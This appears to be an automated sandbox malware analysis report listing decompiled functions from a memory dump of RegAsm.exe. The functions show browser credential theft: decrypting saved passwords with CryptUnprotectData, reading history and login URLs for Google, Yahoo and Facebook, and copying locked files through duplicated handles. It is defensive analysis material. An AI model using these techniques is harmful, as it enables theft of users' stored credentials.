                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                                                            • API String ID: 1442760552-28296030
                                                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                                                            • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                                                            • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                            • String ID: chp$v10
                                                                                                                            • API String ID: 229402216-2783969131
                                                                                                                            • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                            • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                            • memset.MSVCRT ref: 00413D7F
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                            • memset.MSVCRT ref: 00413E07
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                            • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                            • free.MSVCRT ref: 00413EC1
                                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                            • API String ID: 3957639419-1740548384
                                                                                                                            • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                            • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                            • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                            • String ID: bhv
                                                                                                                            • API String ID: 4234240956-2689659898
                                                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                            • __set_app_type.MSVCRT ref: 00446762
                                                                                                                            • __p__fmode.MSVCRT ref: 00446777
                                                                                                                            • __p__commode.MSVCRT ref: 00446785
                                                                                                                            • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                            • _initterm.MSVCRT ref: 004467C7
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                            • _initterm.MSVCRT ref: 004467FD
                                                                                                                            • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                            • exit.MSVCRT ref: 00446897
                                                                                                                            • _cexit.MSVCRT ref: 0044689D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2791496988-0
                                                                                                                            • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                            • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                            • String ID: visited:
                                                                                                                            • API String ID: 2470578098-1702587658
                                                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                            • free.MSVCRT ref: 0040E28B
                                                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                            • API String ID: 2804212203-2982631422
                                                                                                                            • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                            • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                            • memset.MSVCRT ref: 0040BC75
                                                                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                            • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 115830560-3916222277
                                                                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                            • String ID: r!A
                                                                                                                            • API String ID: 2791114272-628097481
                                                                                                                            • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                            • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                            • API String ID: 2936932814-4196376884
                                                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                            • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                            • String ID: BIN
                                                                                                                            • API String ID: 1668488027-1015027815
                                                                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                                                            • API String ID: 4039892925-11920434
                                                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00403E50
                                                                                                                            • memset.MSVCRT ref: 00403E65
                                                                                                                            • memset.MSVCRT ref: 00403E7A
                                                                                                                            • memset.MSVCRT ref: 00403E8F
